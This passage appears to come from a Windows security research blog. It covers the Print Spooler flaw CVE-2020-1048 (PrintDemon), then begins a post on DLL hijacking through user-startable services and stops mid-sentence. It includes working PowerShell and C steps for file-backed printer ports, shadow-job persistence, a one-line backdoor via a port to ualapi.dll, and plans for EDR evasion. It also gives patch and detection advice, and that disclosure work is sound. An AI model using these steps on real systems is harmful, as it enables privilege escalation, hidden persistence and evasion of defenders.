So let’s install the simplest driver there is: the Generic / Text-Only driver. Open up a PowerShell window (as a standard user, if you’d like), and write:

> Add-PrinterDriver -Name "Generic / Text Only"

Now you can enumerate the installed drivers:

> Get-PrinterDriver

Name                                PrinterEnvironment MajorVersion    Manufacturer
----                                ------------------ ------------    ------------
Microsoft XPS Document Writer v4    Windows x64        4               Microsoft
Microsoft Print To PDF              Windows x64        4               Microsoft
Microsoft Shared Fax Driver         Windows x64        3               Microsoft
Generic / Text Only                 Windows x64        3               Generic

If you’d like to do this in plain old C, it couldn’t be easier:

hr = InstallPrinterDriverFromPackage(NULL, NULL, L"Generic / Text Only", NULL, 0);

Our next required step is to have a port that we can associate with our new printer. Here’s an interesting, not well documented twist, however: a port can be a file — and that’s not the same thing as “printing to a file”. It’s a file port, which is an entirely different concept. And adding one is just as easy as yet another line of PowerShell (we used a world writeable directory as our example):

> Add-PrinterPort -Name "C:\windows\tracing\myport.txt"

Let’s see the fruits of our labour:

> Get-PrinterPort | ft Name

Name
----
C:\windows\tracing\myport.txt
COM1:
COM2:
COM3:
COM4:
FILE:
LPT1:
LPT2:
LPT3:
PORTPROMPT:
SHRFAX:

To do this in C, you have two choices. First, you can prompt the user to input the port name, by using the AddPortW API. You don’t actually need to have your own GUI — you can pass NULL as the hWnd parameter — but you also have no control and will block until the user creates the port. The UI will look like this:

Another choice is to manually replicate what the dialog does, which is to use the XcvData API. Adding a port is as easy as:

PWCHAR g_PortName = L"c:\\windows\\tracing\\myport.txt";
dwNeeded = ((DWORD)wcslen(g_PortName) + 1) * sizeof(WCHAR);
XcvData(hMonitor,
        L"AddPort",
        (LPBYTE)g_PortName,
        dwNeeded,
        NULL,
        0,
        &dwNeeded,
        &dwStatus);

The more complicated part is getting that hMonitor — which requires a bit of arcane knowledge:

PRINTER_DEFAULTS printerDefaults;
printerDefaults.pDatatype = NULL;
printerDefaults.pDevMode = NULL;
printerDefaults.DesiredAccess = SERVER_ACCESS_ADMINISTER;
OpenPrinter(L",XcvMonitor Local Port", &hMonitor, &printerDefaults);

You might see ADMINISTER in there and go a-ha — that needs Administrator privileges. But in fact, it does not: anyone can add a port. What you’ll note though, is that passing in a path you don’t have access to will result in an “Access Denied” error. More on this later.

Don’t forget to be a good citizen and call ClosePrinter(hMonitor) when you’re done!

We have a port, we have a printer driver. That is all we need to create a printer and bind it to these two elements. And again, this does not require a privileged user, and is yet another single line of PowerShell:

> Add-Printer -Name "PrintDemon" -DriverName "Generic / Text Only" -PortName "c:\windows\tracing\myport.txt"

Which you can now check with:

> Get-Printer | ft Name, DriverName, PortName

Name       DriverName          PortName
----       ----------          --------
PrintDemon Generic / Text Only C:\windows\tracing\myport.txt

The C code is equally simple:

PRINTER_INFO_2 printerInfo = { 0 };
printerInfo.pPortName = L"c:\\windows\\tracing\\myport.txt";
printerInfo.pDriverName = L"Generic / Text Only";
printerInfo.pPrinterName = L"PrintDemon";
printerInfo.pPrintProcessor = L"WinPrint";
printerInfo.pDatatype = L"RAW";
hPrinter = AddPrinter(NULL, 2, (LPBYTE)&printerInfo);

Now you have a printer handle, and we can see what this is good for. Alternatively, you can use OpenPrinter once you know the printer exists, which only needs the printer name.
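
For example, once the printer exists, re-opening it by name is a one-liner (default access is enough to spool jobs to it):

HANDLE hPrinter = NULL;
//
// No PRINTER_DEFAULTS needed just to print to the printer we created above
//
OpenPrinter(L"PrintDemon", &hPrinter, NULL);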

What can we do next? Well the last step is to actually print something. PowerShell delivers another simple command to do this:

> "Hello, Printer!" | Out-Printer -Name "PrintDemon"

If you take a look at the file contents, however, you’ll notice something “odd”:

0D 0A 0A 0A 0A 0A 0A 20 20 20 20 20 20 20 20 20
20 48 65 6C 6C 6F 2C 20 50 72 69 6E 74 65 72 21
0D 0A …

Opening this in Notepad might give you a better visual indication of what’s going on — PowerShell thinks this is an actual printer. So it’s respecting the margins of the Letter (or A4) format, adding a few new lines for the top margin, and then spacing out your string for the left margin. Cute.

Bear in mind, this is behavior that in C, you can configure — but typically Win32 applications will print this way, since they think this is a real printer.

Speaking of C, how can you achieve the same effect? Well, here, we actually have two choices — but we’ll cover the simpler and more commonly taken approach, which is to use the GDI API, which will internally create a print job to handle our payload.

DOC_INFO_1 docInfo;
docInfo.pDatatype = L"RAW";
docInfo.pOutputFile = NULL;
docInfo.pDocName = L"Document";
StartDocPrinter(hPrinter, 1, (LPBYTE)&docInfo);

PCHAR printerData = "Hello, printer!\n";
dwNeeded = (DWORD)strlen(printerData);
WritePrinter(hPrinter, printerData, dwNeeded, &dwNeeded);

EndDocPrinter(hPrinter);

And, voila, the file contents now simply store our string.

To conclude this overview, we’ve seen how with a simple set of unprivileged PowerShell commands, or equivalent lines of C, we can essentially write data on the file system by pretending it’s a printer. Let’s take a look at what happens behind the scenes in Process Monitor.

Spooling as Evasion

Let’s take a look at all of the operations that occurred when we ran these commands. We’ll skip the driver “installation” as that’s just a mess of PnP and Windows Servicing Stack, and begin with adding the port:

Here we have our first EDR / DFIR evidence trail: it turns out that printer ports are nothing more than registry values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports. Obviously, only privileged users can write to this registry key, but the Spooler service does it for us over RPC, as you can see in the stack trace below:

Next, let’s see how the printer creation looks like:

Again, we see that the operations are mostly registry based. Here’s what a printer looks like — note the Port value, for example, which is showing our file path.

Now let’s look at what that PowerShell command did when printing out our document. Here’s a full view of the relevant file system activity (the registry is no longer really involved), with some interesting parts marked out:

Whoa — what’s going on here? First, let’s go a bit deeper in the world of printing. As long as spooling is enabled, data printed doesn’t directly go to the printer. Instead, the job is spooled, which essentially will result in the creation of a spool file. By default, this will live in the c:\windows\system32\spool\PRINTERS directory, but that is actually customizable on a per-system as well as per-printer basis (that’s a thread worth digging into later).

Again, also by default, this file name will either be FPnnnnn.SPL for EMF print operations, or simply nnnnn.SPL for RAW print operations. The SPL file is nothing more than a copy, essentially, of all the data that is meant to go to the printer. In other words, it briefly contained the “Hello, printer!” string.

A more interesting file is the shadow job file. This file is needed because print jobs aren’t necessarily instant. They can error out, be scheduled, be paused, either manually or due to issues with the printer. During this time, information about the job itself must remain in more than just Spoolsv.exe’s memory, especially since it is often prone to crashing due to 3rd party printer driver bugs — and due to the fact that print jobs survive reboots. Below, you can see the Spooler writing out this file, whose data structure has changed over the years, but has now reached the SHADOWFILE_4 data structure that is documented on our GitHub repository.

We’ll talk about some interesting things you can do with the shadow job file later in the persistence section.

Next, we have the actual creation of the file that is serving as our port. Unfortunately, Process Monitor always shows the primary token, so if you double-click on the event, you’ll see this operation is actually done under impersonation:

This may actually seem like a key security feature of the Spooler service — without it, you could create a printer port to any privileged location on the disk, and have the Spooler “print” to it, essentially achieving an arbitrary file system read/write primitive. However, as we’ll describe later, the situation is a bit more complicated. It may also seem like, from an EDR perspective, you still have some idea as to who the user is. But, stay tuned.

Finally, once the write is done, both the spool file and the shadow job file are deleted (by default), which is seen as those SetDisposition calls:

So far, what we’ve shown is that we can write anywhere on disk — presumably to locations that we have access to — under the guise of the Spooler service. Additionally, we’ve shown that the file creation is done under impersonation, which should reveal the original user behind the operation. Investigating the job itself will also show the user name and machine name. So far, forensically, it seems like as long as this information can be gathered, it’s hard to hide…

We will break both of those assumptions soon, but first, let’s take a look at an interesting way that this behavior can be used.

Spooling as IPC

The first interesting use of the Spooler, and most benign, is to leverage it for communication between processes, across users, and even across reboots (and potentially networks). You can essentially treat a printer as a securable object (technically, a printer job is too, but that’s not officially exposed) and issue both read and write operations in it, through two mechanisms:

  • Using the GDI API, and issuing ReadPrinter and WritePrinter commands.
    • First, you must have issued a StartDocPrinter and EndDocPrinter pair of calls (with the writes in between) to create the printer job and spool data into it.
    • The trick is to use SetJob to make the job enter a paused state from the beginning (JOB_CONTROL_PAUSE), so the spool file remains persistent.
    • The former API returns a print job ID, which the client side can then use as part of a call to OpenPrinter with the special syntax of adding the suffix ,Job n to the printer name, which opens a print job instead of a printer (see the sketch after this list).
      • Clients can use the EnumJobs API to enumerate all the printer jobs and find the one they want to read from based on some properties.
  • Using the raw print job API, and using WriteFile after obtaining a handle to the spool file.
    • Once the writes are complete, call ScheduleJob to officially make it visible.
    • The client continues to use ReadPrinter, as in the other option.
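
To make that flow concrete, here is a rough sketch of both sides, using the GDI approach. The printer name, the hard-coded job ID, and the lack of error handling are simplified assumptions on our part (in practice the client would discover the job ID with EnumJobs), not the exact code from our PoC:

DWORD jobId;
DWORD written;
HANDLE hJob;
BYTE buffer[512];
DWORD bytesRead;
PCHAR sharedData = "some shared data";

//
// Writer side: hPrinter comes from OpenPrinter; pause the job right away so
// the spool file (and the job itself) stick around for the reader
//
jobId = StartDocPrinter(hPrinter, 1, (LPBYTE)&docInfo);
SetJob(hPrinter, jobId, 0, NULL, JOB_CONTROL_PAUSE);
WritePrinter(hPrinter, sharedData, (DWORD)strlen(sharedData), &written);
EndDocPrinter(hPrinter);

//
// Reader side: open the paused job with the ",Job n" suffix and drain it
//
if (OpenPrinter(L"MyPrinter, Job 3", &hJob, NULL))
{
    while (ReadPrinter(hJob, buffer, sizeof(buffer), &bytesRead) && (bytesRead != 0))
    {
        // Consume the data the writer spooled into the job
    }
    ClosePrinter(hJob);
}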

You might wonder what advantages any of this has versus just using regular File I/O. We’ve thought of a few:

  • If going with the full GDI approach, you’re not importing any obvious I/O APIs
  • The reads and writes, when done through ReadPrinter and WritePrinter, are not done under impersonation. This means they appear as if coming from SYSTEM running inside Spoolsv.exe
    • This also potentially means you can read and write a spooler file in a location you’d normally not have access to.
  • It’s doubtful any security products, until just about now, have ever investigated or looked at spooler files
    • And, with the right API/registry changes, you can actually move the spooler directory somewhere else for your printer
  • By cancelling the job, you get immediate deletion of the data, again, from a service context
  • By resuming the job, you essentially achieve a file copy — albeit this one does happen impersonated, as we’ve learnt so far

We’ve published on our GitHub repository a simple printclient and printserver application, which implement a client/server mechanism for communicating between two processes by leveraging these ideas.

Let’s see what happens when we run the server:

As expected, we now have a spool file created, and we can see the print queue below showing our job — which is highly visible and traceable, if you know to look.

On the client side, let’s run the binary and look at the result:

The information you see at the top comes from the printer API — using EnumJobs and GetJob to retrieve the information that we want. Additionally, however, we went a step deeper, as we wanted to look at the information stored in the shadow job itself. We noted some interesting discrepancies:

  • Even though MSDN claims otherwise, and the API will always return NULL, print jobs do indeed have security descriptors
    • Trying to zero them out in the shadow job made the Spooler unable to ever resume/write the data!
  • Some data is represented differently
    • For example, the Status field in the shadow job has different semantics, and contains internal statuses that are not exposed through the API
    • Or, the StartTime and UntilTime, which are 0 in the API, are actually 60 in the shadow job

We wanted to better understand how and when the shadow job data is read, and when the Spooler’s internal state is used instead — just like the Service Control Manager has its own in-memory database of services but also backs it all up in the registry, we figured the Spooler must work in a similar way.

Spooler Forensics

Eventually, thanks to the fact that the Spooler is written in C++ (which has rich type information due to mangled function names) we understood that the Spooler keeps track of jobs in INIJOB data structures.

We started looking at the various data structures involved in keeping track of Spooler information, and came up with the following data structures, each of which has a human-readable signature which makes reverse engineering easier:

For full disclosure, it seems GitHub continues to host NT4 source code for the world to look at, and when searching for some of these types, the Spltypes.h header file repeatedly came up. We used it as an initial starting point, and then manually updated the structures based on reverse engineering.

To start with, you’ll want to find the pLocalIniSpooler pointer in Localspl.dll — this contains a pointer to INISPOOLER, which is partially shown below:

Here it is in memory:

As you can see, this key data structure points to the first INIPRINTER, the INIMONITOR, the INIENVIRONMENT, the INIPORT, the INIFORM, and the SPOOL. From here, we could start by dumping the printer, which starts with the following data structure:

In memory, for the printer the printserver PoC on GitHub creates, you’d see:

You could also choose to look at the INIPORT structures linked by the INISPOOLER earlier — or directly grab the one associated with the INIPRINTER above. Each one looks like this:

Once again, the port we created in the PoC looks like this in memory, at the time that the job is being spooled:

Finally, both the INIPORT and the INIPRINTER were pointing to the INIJOB that we created. The structure looks as such:

This should be very familiar, as it’s a different representation of much of the same data from the shadow job file as well as what EnumJobs and GetJob will return. For our job, this is what it looked like in memory:

Locating and enumerating these structures gives you a good forensic overview of what the Spooler has been up to — as long as Spoolsv.exe is still running and nobody has tampered with it.

Unfortunately, as we’re about to show, that’s not something you can really depend on.

Spooling as Persistence

Since we know that the Spooler is able to print jobs even across reboots (as well as when the service exits for any reason), it stands to reason that there’s some logic present to absorb the shadow job file data and create INIJOB structures out of it.

Looking in IDA, we found the following aptly named function and associated loop, which is called during the initialization of the Local Spooler:

Essentially, this processes any shadow job file data associated with the Spooler itself (server jobs, as they’re called), and then proceeds to enumerate every INIPRINTER, get its spooler directory (typically, the default), and process its respective shadow job file data.

This is performed by ProcessShadowJobs, which mainly executes the following loop:

It’s not visible here, but the *.SHD wildcard is used as part of the FindFirstFile API, so each file matching this extension is sent to ReadShadowJob. This breaks one of our assumptions: there’s no requirement for these files to follow the naming convention we described earlier. Combined with the fact that a printer can have its own spooler directory, it means these files can be anywhere.

Looking at ReadShadowJob, it seemed that only basic validation was done of the information present in the header, and many fields were, in fact, totally optional. We constructed, by hand with a hex editor, a custom shadow job file that only had the bare minimum to associate it to a printer, and restarted the Spooler, taking a look at what we’d see in Process Monitor. We also created a matching .SPL file with the same name, where we wrote a simple string.

First, we noted the Spooler scanning for FPnnnnn SPL files, which are normally associated with EMF jobs (the FP stands for File Pool). Then, it searched for SHD files, found ours, opened the matching SPL file, and continued looking for more files. None were present, so NO MORE FILES was returned.

So, interestingly, you’ll notice how in the stack below, the DeleteOrphanFiles API is called to clean up FP files:

But the opposite effect happens for SHD files after — the following stack shows you ProcessShadowJobs calling ReadShadowJob, as the IDA output above hypothesized.

What was the final effect of our custom placed SHD file, you ask? Well, take a look at the print queue for the printer that we created…

It’s not looking great, is it? Double-clicking on the job gives us the following, equally useless information.

Given that this job seems outright corrupt, and indicates 0 bytes of data, you’d probably expect that resuming this job will abort the operation or crash in some way. So did we! Here’s what actually happens:

The whole thing works just fine and goes off and writes the entire spool file into our printer port, actual size in the SHADOWFILE_4 be damned. What’s even crazier is that if you manually try calling ReadPrinter yourself, you won’t see any data come in, because the RPC API actually checks for this value — even though the PortThread does not!

What we’ve shown so far, is that with very subtle file system modifications, you can achieve file copy/write behavior that is not attributable to any process, especially after a reboot, unless some EDR/DFIR software somehow knew to monitor the creation of the SHD file and understood its importance. With a carefully crafted port name, you can imagine simply having the Spooler drop a PE file anywhere on disk for you (assuming you have access to the location).

But things were about to take a whole different turn in our research, when we asked ourselves the question — “wait, after a reboot, how does the Spooler even manage to impersonate the original user — especially if the data in the SHD file can be NULL‘ed out?”.

Self Impersonation Privilege Escalation (SIPE)

Since Process Monitor can show impersonation tokens, we double-clicked on the CreateFile event, just as we had done at the beginning of this blog. We saw that indeed, the PortThread was impersonating… but… but…

The Spooler is impersonating… SYSTEM! It seems the code was never written to handle a situation that would arise where a user might have logged out, or rebooted, or simply the Spooler crashing, and now we can write anywhere SYSTEM can. Indeed, looking at the NT4 source code, the PrintDocumentThruPrintProcessor function just zooms through and writes into the port.

However, we’re not ones to trust 30 year old code on GitHub, so we stuck with our trusty IDA, and indeed saw the following code, which was added sometime around the Stuxnet era:

And, indeed, CanUserAccessTargetFile immediately checks if hToken is NULL, and if so, returns FALSE and sets the LastError to ERROR_ACCESS_DENIED.

Boom! Game Over! The code is safe, we checked it! Believe it or not, we’ve previously gotten this type of response to security reports (not lately!).

Clearly, something is amiss, since we saw our write go through “impersonating” SYSTEM.

This is where a very deep subtlety arises. Pay attention to this code in CreateJobEntry, which is what ultimately initializes an INIJOB, and, if needed, sets JOB_PRINT_TO_FILE.

A print job is considered to be headed to a file only if the user selected the “Print to file” checkbox you see in the typical print dialog. A port that happens to be a literal file, on the other hand, completely skips this check.

Well, OK then — let’s stop with this C:\Windows\Tracing\ lameness, and create a port in C:\Windows\System32\Ualapi.dll. Why this DLL? Well, you saw why in Part Two!

Hmmm, that’s not so easy:

We are caught in the act, as you can see from the following Process Monitor output:

The following stack shows how XcvData is called (an API you saw earlier) with the PortIsValid command. While you can’t see it here (it’s on the “Event” tab), the Spooler is impersonating the user at this point, and the user certainly doesn’t have write access to c:\Windows\System32!

As such, it would seem that while it’s certainly interesting that we can get the Spooler to write files to disk after a reboot / service start, without impersonation, it’s unclear how this can be useful, since a port pointing to a privileged directory must first be created. As an Administrator, it’s a great evasion and persistence trick, but you might think this is where the game stops.

While messing around with ways to abuse this behavior (and we found a few!), we also stumbled into something way, way, way, way… way simpler than the advanced techniques we were coming up with. And, it would seem, so did the folks at SafeBreach Labs, who beat us to the punch (gratz!) with CVE-2020-1048, which we’ll cover below.

Client Side Port Check Vulnerability (CVE-2020-1048)

This bug is so simple that it’s almost embarrassing once you realize all it would’ve taken is a PowerShell command.

If you scroll back up to where we showed the registry access in Spoolsv.exe as a result of Add-PrinterPort, you see a familiar XcvData stack — but going straight to XcvAddPort / DoAddPort — and not DoPortIsValid. Initially, we assumed that the registry access was being done after the file access (which we had masked out in Process Monitor), and that port validation had already occurred. But, when we enabled file system events… we never saw the CreateFile.

Using the UI, on the other hand, first showed us this stack and file system access, and then went ahead and added the port.

Yes, it was that simple. The UI dialog has a client-side check… the server, does not. And PowerShell’s WMI Print Provider Module… does not.

This isn’t because PowerShell/WMI has some special access. The code in our PoC, which uses XcvData with the AddPort command, directly gets the Spooler to add a port with zero checking.

Normally, this isn’t a big deal, because all subsequent print job operations will have the user’s token captured, and the file accesses will fail.

But not… if you reboot, or kill the Spooler in some way. While that’s not necessarily obvious for an unprivileged user, it’s not hard — especially given the complexity and age of the Spooler (and its many 3rd party drivers).

So yes, walk to any unpatched system out there — you all have Windows 7 ESUs, right? — and just write Add-PrinterPort -Name c:\windows\system32\ualapi.dll in a PowerShell window. Congratulations! You’ve just given yourself a persistent backdoor on the system. Now you just need to “print” an MZ file to a printer that you’ll install using the steps above, and you’re set.

If the system is patched, however, this won’t work. Microsoft fixed the vulnerability by now moving the PortIsValid check inside of LcmXcvDataPort. That being said, however, if a malicious port was already created, a user can still “print” to it. This is because of the behavior we explained above — the checks in CanUserAccessTargetFile do not apply to “ports pointing to files” — only when “printing to a file”.

Conclusion — Call to Action!

This bug is probably one of our favorites in Windows history, or at least one of our Top 5, due to its simplicity and age — completely broken in original versions of Windows, hardened after Stuxnet… yet still broken. When we submitted some additional related bugs (due to responsible disclosure, we don’t want to hint where these might be), we thought the underlying impersonation behavior would also be addressed, but it seems that this is meant to be by design.

Since the fix for PortIsValid makes the impersonation behavior moot for newly patched systems but leaves them vulnerable to pre-existing ports, we really wanted to get this blog out there to warn the industry about this potentially latent threat, now that a patch is out and attackers would’ve quickly figured out the issue (load Localspl.dll in Diaphora — the two-line call to PortIsValid jumps out at you as the only change in the binary).

There are two steps you should immediately take:

  1. Patch! This bug is ridiculously easy to exploit, both as an interactive user and from limited remote-local contexts as well.
  2. Scan for any file-based ports with either Get-PrinterPort in PowerShell, or just dump HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports. Any ports that have a file path in them — especially ones ending in an extension such as .DLL or .EXE — should be treated with extreme prejudice.

Faxing Your Way to SYSTEM — Part Two

“Part two?”, you ask. “Where’s part one?”, you wonder. In this blog post, we are doing things backwards — first publishing a Part Two, with a theoretical “What if?” scenario, and then we’ll follow with a Part One to fill in our gap.

Posit a DLL Hijack

Let’s say you have a way to dump a custom DLL in a privileged directory. You can name the DLL whatever you want and make a privileged process load it instead of one of its own, as part of a privilege escalation attack. This is most useful when there is a process looking for a DLL that is not usually found on the system, so you don’t have to implement all the functionality of the DLL you’re replacing and/or potentially have to deal with the DLL already being in use. This technique goes under a variety of names, such as DLL hijacking and binary planting, and it’s a method that has been known and used for many years. It can also be used as a persistence mechanism, when the goal is to load at every system start.

Unfortunately, there’s not a whole lot of real world public information on actually implementing the technique end-to-end, especially for privilege escalation, without relying on gimmicks. To successfully execute your code, you need:

  • A built-in, Windows native, privileged process that tries loading a non-existent DLL from a privileged directory (if it’s from an unprivileged directory, you have an even bigger problem)
  • A way to reliably start the privileged process, from an unprivileged context
    • Online sources resort to gimmicks such as “run these commands in a loop and after 20 tries you’ll get Xxx.exe” or “and now reboot the machine!”

This really doesn’t sound hard, but we could not find anything online that accurately fulfilled these two requirements. So, while in this post, we’re not claiming anything novel, we will combine some obscure Windows Internals together to weaponize a bind shell (see? we told you it wasn’t novel — it’s not even a reverse shell) with some neat EDR bypasses and forensic gotchas, in order to get some offensive capabilities out in the open and into defenders’ mindsets. You’ll see (and might learn) how to:

  • Identify services that can be started by non-privileged users, so that you can repeat this research and potentially find your own service
  • Talk about trigger started services, and provide another way to launch services from a non-privileged user account
  • Use a previously unused service which is vulnerable to a DLL hijack, which reduces chance of detection, and introduces a reliable escalation vector
  • Leverage the Windows Thread Pool API for additional stealth, leveraging arbitrary threads and harder-to-infer malicious behavior, often whitelisted by EDR
  • Use some more esoteric, high-performance Windows Socket APIs, which results in less standard imports (no socket, accept, recv, or send) and simpler code
  • Abuse the Windows Socket API to hide and misdirect the owner process from Netstat, Process Hacker, Process Monitor, and even WFP (Windows Filtering Platform) and BFE (Base Filtering Engine)-based firewall solutions.
  • Escalate privileges from NETWORK SERVICE to SYSTEM, without any “bean” or “potato”-based DCOM/HTTP attacks
  • Launch a process as SYSTEM in a non-traditional way using process reparenting
  • Awesome DLL hijacking in Windows Defender ATP and Windows 21H1 (“Manganese”), for the lulz

We will be heavily relying on existing research from other people here, so we want to make sure there is no implied claim that these are hyped-up “never before seen” techniques. We just packaged them up nicely with a bow.

Surveying the Landscape

If you search online, you’ll find four commonly used built-in services (even more 3rd party) on Windows that are vulnerable to a DLL hijack:

  1. Wmiprvse.exe, which likes to load loads of things from c:\windows\system32\wbem\, especially Wbemcomn.dll
    1. But it often impersonates the caller when you run WMI commands yourself, so now you need to get a privileged process to issue a WMI command to spawn a WMI Provider
    2. We could not find reliable sources online on how to operationally achieve this 100% of the time
    3. This is a well-known service and target DLL, often abused by malware, and in almost everyone’s PoCs
  2. Ikeext.dll (running in a Svchost.exe) which loads Wlbsctrl.dll from c:\windows\system32\
    1. This is already running in corporate environments with a VPN — online sources assume you can just sc stop it, but that privilege is only granted to Administrators.
    2. If it’s not already running, you cannot just sc start it. The common technique is to use Rasdial.exe to trigger it to start.
    3. Extremely well-known, abused in the wild, a dozen blog posts on the topic
  3. Sessenv.dll (running in a Svchost.exe) which loads Tsmsisrv.dll from c:\windows\system32\
    1. This one has the advantage of not typically running unless you’ve hit an RDP machine
    2. But it does not grant Start/Stop privileges to unprivileged users and does not have an obvious trigger to start it
    3. Well known and has been abused in the wild for persistence
  4. Searchprotocolhost.exe and Searchindexer.exe will load Msfte.dll from c:\windows\system32\
    1. Cannot be directly started by a non-privileged user, but can often be “triggered” by noisy file-system activity
    2. Well known and catalogued, and also used in the wild by APT groups

In all of these scenarios, Administrator access was already assumed (i.e.: these were mechanisms for persistence, not privilege escalation), or there were unreliable ways to “maybe” trigger the service to start. Additionally, these techniques were known and probably detected by major AV and EDR vendors. We wanted something a little bit more interesting.

Finding the Target — User Startable Services

First, our interest was to identify services that are vulnerable to DLL hijacking attempts other than the afore-mentioned ones. Figuring this out is old & tired infosec practice — run Process Monitor with the right filters, start a bunch of services (or reboot the box), profit! Countless tutorials online can help you learn how to do this. We applied some different twists, however, which are worth going into. First, remember that a reboot is unacceptable in our use case — we want to elevate privileges now. So we had to rely on starting services that weren’t already started — or finding a service that can be stopped by a standard user. Second, many online tutorials will have you only looking at SYSTEM processes. While that is the jackpot, many services run as LOCAL SERVICE and NETWORK SERVICE — two accounts that while not “privileged” from an Administrator Group perspective, can easily elevate to SYSTEM using a few different tactics.

Finally, starting a service typically requires administrative permissions, which defeats our purpose (and so does stopping a service in case it’s already running). We needed to find exceptions to this rule. There are two great tools for looking into service permissions. One is Process Hacker, which allows you, from its Services tab, to double click on a service, and then click the Permissions button on the General tab. For example, here are the permissions for the SessionEnv service:

Well, already, we see that there’s no “Everyone“, “Users” or “Authenticated Users“, which are common groups that include unprivileged users. But there is “INTERACTIVE“, a less commonly seen group that also includes unprivileged users. Now we can double-click on the ACE and see the following:

So that’s not great — all we can really do is query the service and talk to it through SCM control codes.

While nice and graphical, this technique takes time — going down 200 services and clicking a bunch of boxes. So while Process Hacker is great to check one-off services, we wanted a tool to automate this. Enter the venerable Sysinternals Suite, with the AccessChk tool. The following command-line is a great way to get a one-line view of all service permissions:

accesschk.exe -c * -L > servsddl.txt

And you’ll have output like this:

AJRouter
    O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CR;;;AU)S:

ALG
    O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:

AppIDSvc
    O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:

Appinfo
    O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWRPLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CR;;;AU)S:

Reading SDDL strings can be a bit challenging, but what we’re looking for specifically is the “RP” right, which maps to SERVICE_START. And we’d like to see that next to either “IU“, which is the “INTERACTIVE” group, or “BU” for the “Users” group, or “AU“, which is the “Authenticated Users” group, or even better, “WD“, which is the “Everyone” group. You might even get lucky and find “AC“, which is the “ALL_APPLICATION_PACKAGES” group.

Once you find an interesting-looking service, say, “DsSvc“, you can re-run the command against it with a lowercase l switch instead:

\sysint\accesschk.exe -c DsSvc -l
[4] ACCESS_ALLOWED_ACE_TYPE: Everyone
    SERVICE_QUERY_STATUS
    SERVICE_START
[5] ACCESS_ALLOWED_ACE_TYPE: APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
    SERVICE_QUERY_STATUS
    SERVICE_START

So this certainly sounds and seems like an interesting service! The next step is to then run it through the usual suspect — Process Monitor — and try to see any “NAME NOT FOUND” errors while looking for DLLs. You need to be a little careful here, as this is something a lot of blog posts don’t talk about: you might find “red herrings”. For example, Windows Defender does look up a lot of DLL paths, as part of its sandbox/heuristics, but these aren’t actual LoadLibrary calls. We’ve also seen services loading Mfc42.dll, which looked promising, but a deeper analysis of the call stack showed the LoadLibraryAsDataFile function, which doesn’t actually execute code or call any entrypoints/exports.

Since DsSvc wasn’t fruitful, we moved on (our search query was to look for “RP;;WD“, just to go for the most egregious cases, but there are certainly other candidates too). Next up in our results was:

\sysint\accesschk.exe -c fax -l
[0] ACCESS_ALLOWED_ACE_TYPE: Everyone
    SERVICE_QUERY_STATUS
    SERVICE_START

We didn’t know it yet, but we were about to hit a jackpot.

For completeness’ sake, the only other 3 built-in Windows services which allow “Everyone” to launch them are icssvc, PhoneSvc, and TabletInputService. There are more that allow INTERACTIVE, Authenticated Users, and Users, however.

User Startable Services — Round Two

Before going deep into the Fax Service, it’s worth talking about another way that a service can be started, regardless of the permissions associated with it. In Windows Vista, Microsoft introduced the Unified Background Process Manager (UBPM), which mimics the functionality of systemd on Linux systems or launchd on macOS — it supports a variety of “triggers”, which can be associated with system events such as PnP Device Arrival Notifications, RPC Endpoint Lookups, WNF State Notifications, Socket Connections, or even ETW Events.

The Service Control Manager (SCM) was then updated to allow services to be started based on a trigger, and you can use Process Hacker for a nice GUI view of the triggers that a service has. Here are the ones for TabletInputService:

Device Interface Arrival notifications aren’t great, since there’s no way to “fake” them from an unprivileged account (as far as we know). But let’s take a look at another example, the DsSvc service — and let’s actually showcase another tool that can dump trigger information: the Sc.exe built-in utility itself:

sc qtriggerinfo DsSvc
[SC] QueryServiceConfig2 SUCCESS
SERVICE_NAME: DsSvc
    START SERVICE
        NETWORK EVENT                : bc90d167-9470-4139-a9ba-be0bbbf5b74d [RPC INTERFACE EVENT]
          DATA                       : BF4DC912-E52F-4904-8EBE-9317C1BDD497

What does this tell us? First, the first GUID, labelled as RPC INTERFACE EVENT has this to say on MSDN:
“The event is triggered when an endpoint resolution request arrives for the RPC interface GUID specified by pDataItems.”
Well, since any user account is permitted to resolve an RPC endpoint, then talking to the RPC endpoint mapper to resolve this GUID will launch the service — even if we don’t ultimately have permissions to connect to it. Here’s the service currently lying dormant:

sc query dssvc
SERVICE_NAME: dssvc
    TYPE               : 30  WIN32
    STATE              : 1  STOPPED

And here’s us trying to ping the Interface ID that was specified:

rpcping -t ncalrpc -f BF4DC912-E52F-4904-8EBE-9317C1BDD497 -v 2

RPCPing v6.0. Copyright (C) Microsoft Corporation, 2002-2006
Trying to resolve interface BF4DC912-E52F-4904-8EBE-9317C1BDD497, Version: 1.0
Completed 1 calls in 1 ms
1000 T/S or   1.000 ms/T

We can see that the interface replied back to our ping! Let’s take a look at the service now:

sc query dssvc
SERVICE_NAME: dssvc
    TYPE               : 30  WIN32
    STATE              : 4  RUNNING
                         (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)

Another type of accessible trigger is the ETW Trigger. Here’s an example service that uses it, the Windows Error Reporting Service:

sc qtriggerinfo WerSvc
[SC] QueryServiceConfig2 SUCCESS
SERVICE_NAME: WerSvc
        START SERVICE
            CUSTOM     : e46eead8-0c54-4489-9898-8fa79d059e0e [ETW PROVIDER UUID]

All it takes is a simple call to EventWrite with the correct ETW GUID, and the service will start. You can do this in C, or even in PowerShell. We modified the linked PS script to use the GUID below instead of the provided one:

